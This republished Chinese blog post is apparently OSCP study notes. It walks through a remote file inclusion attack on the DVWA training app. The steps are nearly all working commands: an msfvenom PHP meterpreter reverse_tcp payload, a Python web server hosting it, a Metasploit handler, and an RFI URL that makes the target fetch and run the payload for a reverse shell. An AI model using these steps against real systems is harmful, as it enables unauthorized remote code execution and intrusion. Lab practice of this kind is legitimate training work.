OSCP Security Technology - Remote File Inclusion(RFI)

时间:2021-08-15
本文章向大家介绍OSCP Security Technology - Remote File Inclusion(RFI),主要包括OSCP Security Technology - Remote File Inclusion(RFI)使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

OSCP Security Technology - Remote File Inclusion(RFI)

DVWA

Download and install DVWA .

https://dvwa.co.uk/

Pre-set

Browser the following website.(admin/password)

http://192.168.2.52/dvwa/login.php

Set the security level to low.

File Inclusion

Click File Inclusion button.

Modify the URL:

http://192.168.2.52/dvwa/vulnerabilities/fi/?page=http://www.baidu.com

Download php reverse shell from pentestmonkey website.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Move the shell file to /var/www/html, and modify the parameters - IP/port.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.26 LPORT=4444 >> exploit.php

service apache2 stop
python -m SimpleHTTPServer 80

msfconsole
use exploit/multi/handler
set LHOST 192.168.2.26
set LPORT 4444
set payload php/meterpreter/reverse_tcp
exploit

Browser the following url:

http://192.168.2.52/dvwa/vulnerabilities/fi/?page=http://192.168.2.26/exploit.php

Result:

  2. Create a new session

shell
相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。

原文地址:https://www.cnblogs.com/keepmoving1113/p/15144859.html

随机文章
本站知识点必读
最近更新